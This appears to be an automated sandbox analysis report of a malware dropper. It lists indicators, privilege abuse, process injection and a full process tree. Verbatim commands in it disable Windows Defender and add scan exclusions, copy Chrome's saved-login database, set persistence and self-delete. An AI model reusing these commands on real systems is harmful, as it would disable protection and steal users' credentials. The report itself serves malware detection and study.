d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Altrove.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 9 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 61 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 530 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 101 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 143 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 212 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 521 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 612 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 637 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 648 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exerun.exeWed09d27135e5a8b3b.tmpWed09b2a8bc4f16cb.exeWerFault.exeWerFault.exeExplorer.EXEpid process 1812 powershell.exe 1812 powershell.exe 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 1812 powershell.exe 2848 run.exe 2848 run.exe 4612 Wed09d27135e5a8b3b.tmp 4612 Wed09d27135e5a8b3b.tmp 2848 run.exe 2848 run.exe 1988 powershell.exe 1812 powershell.exe 2080 Wed09b2a8bc4f16cb.exe 2080 Wed09b2a8bc4f16cb.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 3152 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 5268 WerFault.exe 2888 Explorer.EXE 2888 Explorer.EXE 2888 Explorer.EXE 2888 Explorer.EXE 2888 Explorer.EXE 2888 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2888 Explorer.EXE -
Suspicious behavior: MapViewOfSection 32 IoCs
Processes:
Wed09b2a8bc4f16cb.exeZzEa6lWClVPLFIq3UqymzBXh.exeAZncMKOcV3N_LXTxtk8_VdBl.execmd.exe67j94FgroPgh6JIk3aUx67IB.exeuphVV8ghcsrAKvTLycJGCo_b.exe9E51.exeD800.exeMicrosoftEdgeCP.execbwcirjMicrosoftEdgeCP.exeuswcirjcbwcirjpid process 2080 Wed09b2a8bc4f16cb.exe 5000 ZzEa6lWClVPLFIq3UqymzBXh.exe 5000 ZzEa6lWClVPLFIq3UqymzBXh.exe 5000 ZzEa6lWClVPLFIq3UqymzBXh.exe 1248 AZncMKOcV3N_LXTxtk8_VdBl.exe 1248 AZncMKOcV3N_LXTxtk8_VdBl.exe 1248 AZncMKOcV3N_LXTxtk8_VdBl.exe 2316 cmd.exe 2316 cmd.exe 1164 67j94FgroPgh6JIk3aUx67IB.exe 6328 uphVV8ghcsrAKvTLycJGCo_b.exe 9212 9E51.exe 2292 D800.exe 2316 cmd.exe 2316 cmd.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 8352 cbwcirj 2316 cmd.exe 2316 cmd.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 5820 MicrosoftEdgeCP.exe 5820 MicrosoftEdgeCP.exe 5136 uswcirj 1988 cbwcirj -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
14498.exepid process 5184 14498.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Wed096a1bff61.exeWed09db0d52c38.exepowershell.exeWed09b3a5ca1a712d390.exepowershell.exeBCleanSoft82.exe4.exe5.exetaskkill.exeWerFault.exe10.exeWerFault.exeExplorer.EXECalculator.exeWerFault.exedescription pid process Token: SeDebugPrivilege 2484 Wed096a1bff61.exe Token: SeCreateTokenPrivilege 1108 Wed09db0d52c38.exe Token: SeAssignPrimaryTokenPrivilege 1108 Wed09db0d52c38.exe Token: SeLockMemoryPrivilege 1108 Wed09db0d52c38.exe Token: SeIncreaseQuotaPrivilege 1108 Wed09db0d52c38.exe Token: SeMachineAccountPrivilege 1108 Wed09db0d52c38.exe Token: SeTcbPrivilege 1108 Wed09db0d52c38.exe Token: SeSecurityPrivilege 1108 Wed09db0d52c38.exe Token: SeTakeOwnershipPrivilege 1108 Wed09db0d52c38.exe Token: SeLoadDriverPrivilege 1108 Wed09db0d52c38.exe Token: SeSystemProfilePrivilege 1108 Wed09db0d52c38.exe Token: SeSystemtimePrivilege 1108 Wed09db0d52c38.exe Token: SeProfSingleProcessPrivilege 1108 Wed09db0d52c38.exe Token: SeIncBasePriorityPrivilege 1108 Wed09db0d52c38.exe Token: SeCreatePagefilePrivilege 1108 Wed09db0d52c38.exe Token: SeCreatePermanentPrivilege 1108 Wed09db0d52c38.exe Token: SeBackupPrivilege 1108 Wed09db0d52c38.exe Token: SeRestorePrivilege 1108 Wed09db0d52c38.exe Token: SeShutdownPrivilege 1108 Wed09db0d52c38.exe Token: SeDebugPrivilege 1108 Wed09db0d52c38.exe Token: SeAuditPrivilege 1108 Wed09db0d52c38.exe Token: SeSystemEnvironmentPrivilege 1108 Wed09db0d52c38.exe Token: SeChangeNotifyPrivilege 1108 Wed09db0d52c38.exe Token: SeRemoteShutdownPrivilege 1108 Wed09db0d52c38.exe Token: SeUndockPrivilege 1108 Wed09db0d52c38.exe Token: SeSyncAgentPrivilege 1108 Wed09db0d52c38.exe Token: SeEnableDelegationPrivilege 1108 Wed09db0d52c38.exe Token: SeManageVolumePrivilege 1108 Wed09db0d52c38.exe Token: SeImpersonatePrivilege 1108 Wed09db0d52c38.exe Token: SeCreateGlobalPrivilege 1108 Wed09db0d52c38.exe Token: 31 1108 Wed09db0d52c38.exe Token: 32 1108 Wed09db0d52c38.exe Token: 33 1108 Wed09db0d52c38.exe Token: 34 1108 Wed09db0d52c38.exe Token: 35 1108 Wed09db0d52c38.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 2656 Wed09b3a5ca1a712d390.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 2632 BCleanSoft82.exe Token: SeDebugPrivilege 2400 4.exe Token: SeDebugPrivilege 1976 5.exe Token: SeDebugPrivilege 2248 taskkill.exe Token: SeRestorePrivilege 3152 WerFault.exe Token: SeBackupPrivilege 3152 WerFault.exe Token: SeDebugPrivilege 3152 WerFault.exe Token: SeDebugPrivilege 1360 10.exe Token: SeDebugPrivilege 5268 WerFault.exe Token: SeShutdownPrivilege 2888 Explorer.EXE Token: SeCreatePagefilePrivilege 2888 Explorer.EXE Token: SeDebugPrivilege 5728 Calculator.exe Token: SeShutdownPrivilege 2888 Explorer.EXE Token: SeCreatePagefilePrivilege 2888 Explorer.EXE Token: SeShutdownPrivilege 2888 Explorer.EXE Token: SeCreatePagefilePrivilege 2888 Explorer.EXE Token: SeShutdownPrivilege 2888 Explorer.EXE Token: SeCreatePagefilePrivilege 2888 Explorer.EXE Token: SeShutdownPrivilege 2888 Explorer.EXE Token: SeCreatePagefilePrivilege 2888 Explorer.EXE Token: SeShutdownPrivilege 2888 Explorer.EXE Token: SeCreatePagefilePrivilege 2888 Explorer.EXE Token: SeShutdownPrivilege 2888 Explorer.EXE Token: SeCreatePagefilePrivilege 2888 Explorer.EXE Token: SeDebugPrivilege 5948 WerFault.exe Token: SeShutdownPrivilege 2888 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
setup.exerun2.exeWed09d27135e5a8b3b.tmpExplorer.EXEAltrove.exe.comAltrove.exe.comAltrove.exe.compid process 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4612 Wed09d27135e5a8b3b.tmp 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 2888 Explorer.EXE 2888 Explorer.EXE 2888 Explorer.EXE 2888 Explorer.EXE 1548 Altrove.exe.com 2888 Explorer.EXE 2888 Explorer.EXE 1548 Altrove.exe.com 1548 Altrove.exe.com 1392 Altrove.exe.com 1392 Altrove.exe.com 1392 Altrove.exe.com 3004 Altrove.exe.com 3004 Altrove.exe.com -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
setup.exerun2.exeAltrove.exe.comAltrove.exe.comAltrove.exe.comAltrove.exe.comAltrove.exe.comAltrove.exe.compid process 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 5088 setup.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 4208 run2.exe 1548 Altrove.exe.com 1548 Altrove.exe.com 1548 Altrove.exe.com 1392 Altrove.exe.com 1392 Altrove.exe.com 1392 Altrove.exe.com 3004 Altrove.exe.com 3004 Altrove.exe.com 3004 Altrove.exe.com 2180 Altrove.exe.com 2180 Altrove.exe.com 2180 Altrove.exe.com 592 Altrove.exe.com 592 Altrove.exe.com 592 Altrove.exe.com 3476 Altrove.exe.com -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 5424 MicrosoftEdge.exe 3248 MicrosoftEdge.exe 8632 MicrosoftEdgeCP.exe 7624 MicrosoftEdge.exe 6604 MicrosoftEdgeCP.exe 6604 MicrosoftEdgeCP.exe 1056 MicrosoftEdge.exe 5820 MicrosoftEdgeCP.exe 5820 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3820 wrote to memory of 4392 3820 setup_x86_x64_install.exe setup_installer.exe PID 3820 wrote to memory of 4392 3820 setup_x86_x64_install.exe setup_installer.exe PID 3820 wrote to memory of 4392 3820 setup_x86_x64_install.exe setup_installer.exe PID 4392 wrote to memory of 3236 4392 setup_installer.exe setup_install.exe PID 4392 wrote to memory of 3236 4392 setup_installer.exe setup_install.exe PID 4392 wrote to memory of 3236 4392 setup_installer.exe setup_install.exe PID 3236 wrote to memory of 408 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 408 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 408 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 700 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 700 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 700 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1064 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1064 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1064 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1164 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1164 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1164 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1240 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1240 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1240 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1328 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1328 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1328 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1456 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1456 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1456 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1520 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1520 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1520 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1596 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1596 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1596 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1788 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1788 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 1788 3236 setup_install.exe cmd.exe PID 700 wrote to memory of 1812 700 cmd.exe powershell.exe PID 700 wrote to memory of 1812 700 cmd.exe powershell.exe PID 700 wrote to memory of 1812 700 cmd.exe powershell.exe PID 408 wrote to memory of 1988 408 cmd.exe powershell.exe PID 408 wrote to memory of 1988 408 cmd.exe powershell.exe PID 408 wrote to memory of 1988 408 cmd.exe powershell.exe PID 1064 wrote to memory of 1572 1064 cmd.exe Wed09f257bb7877d00b2.exe PID 1064 wrote to memory of 1572 1064 cmd.exe Wed09f257bb7877d00b2.exe PID 3236 wrote to memory of 2108 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2108 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2108 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2372 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2372 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2372 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2640 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2640 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2640 3236 setup_install.exe cmd.exe PID 1164 wrote to memory of 2656 1164 cmd.exe Wed09b3a5ca1a712d390.exe PID 1164 wrote to memory of 2656 1164 cmd.exe Wed09b3a5ca1a712d390.exe PID 1164 wrote to memory of 2656 1164 cmd.exe Wed09b3a5ca1a712d390.exe PID 3236 wrote to memory of 2764 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2764 3236 setup_install.exe cmd.exe PID 3236 wrote to memory of 2764 3236 setup_install.exe cmd.exe PID 1328 wrote to memory of 2484 1328 cmd.exe Wed096a1bff61.exe PID 1328 wrote to memory of 2484 1328 cmd.exe Wed096a1bff61.exe PID 1240 wrote to memory of 3416 1240 cmd.exe Wed09d8d6edfaff2ac.exe PID 1240 wrote to memory of 3416 1240 cmd.exe Wed09d8d6edfaff2ac.exe PID 1240 wrote to memory of 3416 1240 cmd.exe Wed09d8d6edfaff2ac.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4825122.exe"C:\Users\Admin\AppData\Roaming\4825122.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4080892.exe"C:\Users\Admin\AppData\Roaming\4080892.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6776654.exe"C:\Users\Admin\AppData\Roaming\6776654.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2482554.exe"C:\Users\Admin\AppData\Roaming\2482554.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0971f17486f8.exeWed0971f17486f8.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09e95ff6b5.exeWed09e95ff6b5.exe6⤵
-
C:\Users\Public\run.exeC:\Users\Public\run.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 2608⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3088753398.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7466882224.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09c42cad92c20f79.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09c42cad92c20f79.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6607⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6807⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6807⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 9407⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 11047⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exeWed094c47c32b.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\ZzEa6lWClVPLFIq3UqymzBXh.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\9E51.exeC:\Users\Admin\AppData\Local\Temp\9E51.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\9E51.exeC:\Users\Admin\AppData\Local\Temp\9E51.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\D281.exeC:\Users\Admin\AppData\Local\Temp\D281.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\D800.exeC:\Users\Admin\AppData\Local\Temp\D800.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\EA22.exeC:\Users\Admin\AppData\Local\Temp\EA22.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im EA22.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EA22.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im EA22.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\490.dll2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B48.exeC:\Users\Admin\AppData\Local\Temp\B48.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\ED4D.exeC:\Users\Admin\AppData\Local\Temp\ED4D.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ED4D.exeC:\Users\Admin\AppData\Local\Temp\ED4D.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\f9056f7f-431e-4060-84c4-36a2a3c4afc4" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
